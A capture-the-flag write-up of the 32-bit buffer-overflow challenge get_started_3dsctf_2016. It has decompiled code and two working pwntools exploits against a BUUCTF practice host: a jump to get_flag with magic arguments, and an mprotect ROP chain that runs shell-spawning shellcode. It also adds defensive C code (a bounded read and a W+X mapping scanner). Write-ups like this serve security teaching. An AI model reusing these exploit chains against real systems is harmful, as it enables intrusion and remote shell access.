get_started_3dsctf_2016
2022-06-24 07:23:00 【[mzq]】

checksec shows the binary is 32-bit. Some protections are enabled, but that is not a big problem. Open it in IDA and look at the main function.

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]
  printf("Qual a palavrinha magica? ", v4);
  gets(&v4); // gets() has no length limit, so the stack buffer can be overflowed
  return 0;
}
```
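The `gets()` call above is the whole bug: nothing bounds the read, so anything past the 0x38-byte buffer lands on the saved registers and the return address. As an added example (not code from the challenge or the writeup), this is the same prompt and read done with `fgets()`, which never stores more than `n-1` bytes and discards the rest of an over-long line. `read_word`, `stored_len_of`, `second_line_intact` and the constructed inputs are all assumptions of this example; `WORD_LEN` is the buffer size the decompiler shows.

```c
#include <stdio.h>
#include <string.h>

#define WORD_LEN 0x38   /* the buffer size the decompiler shows (ebp-0x38) */

/* Reads one line from in into buf (at most n-1 bytes), strips the newline and
 * returns the number of bytes stored, or -1 on EOF/error. A line longer than
 * n-1 bytes is truncated and its remainder discarded, so it can never spill
 * past buf or leak into the next read. */
int read_word(char *buf, size_t n, FILE *in)
{
    if (n == 0 || fgets(buf, (int)n, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';              /* strip the trailing newline */
    } else {
        int c;                          /* no newline seen: drain the rest of the line */
        while ((c = getc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Turns a constructed byte string into a readable stream (standard C only). */
static FILE *stream_from(const char *s, size_t n)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fwrite(s, 1, n, f);
    rewind(f);
    return f;
}

/* Helper for checking: runs read_word over a constructed input string and
 * returns the stored length. */
int stored_len_of(const char *input)
{
    char buf[WORD_LEN];
    FILE *in = stream_from(input, strlen(input));
    if (in == NULL)
        return -1;
    int len = read_word(buf, sizeof buf, in);
    fclose(in);
    return len;
}

/* Feeds a 100-byte line followed by "second" (constructed input) and returns 1
 * when the first read is truncated to WORD_LEN-1 bytes and the second read
 * still yields "second", i.e. the overflow is cut off and nothing carries over. */
int second_line_intact(void)
{
    char input[128];
    memset(input, 'a', 100);
    memcpy(input + 100, "\nsecond\n", 9);   /* 8 chars plus the terminating NUL */
    FILE *in = stream_from(input, strlen(input));
    if (in == NULL)
        return 0;
    char buf[WORD_LEN];
    int first = read_word(buf, sizeof buf, in);
    int second = read_word(buf, sizeof buf, in);
    fclose(in);
    return first == WORD_LEN - 1 && second == 6 && strcmp(buf, "second") == 0;
}

/* The hardened equivalent of the challenge's main(): same prompt, bounded read. */
int main(void)
{
    char word[WORD_LEN];
    printf("Qual a palavrinha magica? ");
    fflush(stdout);
    if (read_word(word, sizeof word, stdin) < 0)
        return 1;
    printf("got %zu byte(s)\n", strlen(word));
    return 0;
}
```

The drain loop matters: without it, the tail of an over-long line stays in the stream and is consumed by the next read, which is a different bug even though memory is no longer corrupted.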
get_flag function

We make a1 == 0x308CD64F and a2 == 0x195719D1, and fill get_flag's return address with the exit function, so that the flag is printed and the process exits normally instead of crashing.
```c
void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al
  if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // only when a1 and a2 equal the given constants is the flag read
  {
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != 255 )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}
```
exp1
```python
from pwn import *

# io = process("./get_started_3dsctf_2016")  # local run
io = remote("node4.buuoj.cn", 26448)          # remote instance
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug", arch="i386")

get_flag_addr = elf.symbols["get_flag"]
exit_addr = elf.symbols["exit"]
ret_addr = 0x08048196
a1 = 0x308CD64F
a2 = 0x195719D1
print(hex(get_flag_addr), hex(exit_addr))

# 56 bytes of padding, then get_flag, its return address (exit) and its two arguments
payload = flat(["a" * 56, ret_addr, get_flag_addr, exit_addr, a1, a2])
io.sendline(payload)
io.recv()
```

mprotect function
Reference: https://blog.csdn.net/qq_32095699/article/details/114225953

Simply put, this function changes the permissions of a memory region. It is a Linux system function with three parameters:
The first parameter is an address: the start of the region to operate on.
The second parameter is the length of the region.
The third parameter is the permission to grant.
These three parameters are held in ebx, esi and ebp.
```c
int __cdecl mprotect(int a1, int a2, int a3)
{
  int result; // eax
  result = dl_sysinfo(a2, a3);
  JUMPOUT(result, -4095, _syscall_error);
  return result;
}
```
See also https://www.wenjiangs.com/doc/dtkwp70q9e#ef45581adcf1589aa9c8efb9d4c10ec4
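Two practical points about mprotect that the description above does not spell out: the address must be page-aligned (the kernel returns EINVAL otherwise; 0x8048000 is a page boundary), and a call with protection 7 (read, write and execute) leaves behind a mapping that a process honouring W^X would never have. That last property is what a defender can look for. The following is an added example, not code from the writeup: a scanner over `/proc/<pid>/maps` lines that flags mappings with both `w` and `x` set. `line_is_wx`, `count_wx`, `scan_pid` and the `SAMPLE_MAPS` lines (constructed, with made-up addresses and inode) are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if one /proc/<pid>/maps line describes a mapping that is both
 * writable and executable, 0 if not, -1 if the line does not parse.
 * Line format: "start-end perms offset dev inode path", perms like "rwxp". */
int line_is_wx(const char *line)
{
    unsigned long start, end;
    char perms[5];
    if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
        return -1;
    return (strchr(perms, 'w') != NULL && strchr(perms, 'x') != NULL) ? 1 : 0;
}

/* Counts W+X mappings among n maps lines. */
int count_wx(const char *const lines[], size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        if (line_is_wx(lines[i]) == 1)
            hits++;
    return hits;
}

/* Constructed sample: the first line is what the binary's first page looks
 * like after mprotect(0x8048000, 0x1000, 7); the rest are ordinary mappings. */
static const char *const SAMPLE_MAPS[] = {
    "08048000-08049000 rwxp 00000000 08:01 1234   /tmp/get_started_3dsctf_2016",
    "08049000-080ea000 r-xp 00001000 08:01 1234   /tmp/get_started_3dsctf_2016",
    "080ea000-080ec000 rw-p 000a1000 08:01 1234   /tmp/get_started_3dsctf_2016",
    "bffdf000-c0000000 rw-p 00000000 00:00 0      [stack]",
};
#define SAMPLE_MAPS_LEN (sizeof SAMPLE_MAPS / sizeof SAMPLE_MAPS[0])

/* Runs the scanner over the constructed sample. */
int sample_wx_count(void)
{
    return count_wx(SAMPLE_MAPS, SAMPLE_MAPS_LEN);
}

/* Scans a live process by reading /proc/<pid>/maps line by line, printing
 * each W+X mapping. Returns the number found, or -1 if the file cannot be opened. */
int scan_pid(const char *pid)
{
    char path[64], line[512];
    snprintf(path, sizeof path, "/proc/%s/maps", pid);
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    int hits = 0;
    while (fgets(line, sizeof line, f) != NULL) {
        if (line_is_wx(line) == 1) {
            hits++;
            fputs(line, stdout);
        }
    }
    fclose(f);
    return hits;
}

int main(int argc, char **argv)
{
    int n = scan_pid(argc > 1 ? argv[1] : "self");
    printf("%d W+X mapping(s)\n", n);
    return n > 0;
}
```

Run it as `./scanner <pid>` to inspect a running process, or with no argument to check the scanner itself, which should report zero. Hits are not automatically malicious (JIT runtimes create W+X pages by design), but for a small C binary like this challenge a W+X page inside the program image is exactly the artefact the second exploit leaves.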
exp2
The second method uses the mprotect function to make a memory region readable, writable and executable, reads the shellcode into that address, and then returns into it to execute it. It is not that complicated.
```python
from pwn import *

# io = process("./get_started_3dsctf_2016")  # local run
io = remote("node4.buuoj.cn", 26448)          # remote instance
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug", arch="i386")

mprotect_addr = elf.symbols["mprotect"]
read_plt = elf.symbols["read"]
pop_ebx_esi_ebp_ret = 0x0804f460   # gadget that pops the three arguments after each call
buf = 0x8048000                    # page-aligned address inside the binary's image
print(mprotect_addr)

# mprotect(buf, 0x1000, 7) makes the page rwx, then read(0, buf, 0x200) fills it and returns into buf
payload = flat(["a" * 0x38, mprotect_addr, pop_ebx_esi_ebp_ret, buf, 0x1000, 0x7,
                read_plt, buf, 0, buf, 0x200])
io.sendline(payload)

shellcode = asm(shellcraft.sh(), arch="i386")
io.sendline(shellcode)
io.interactive()
```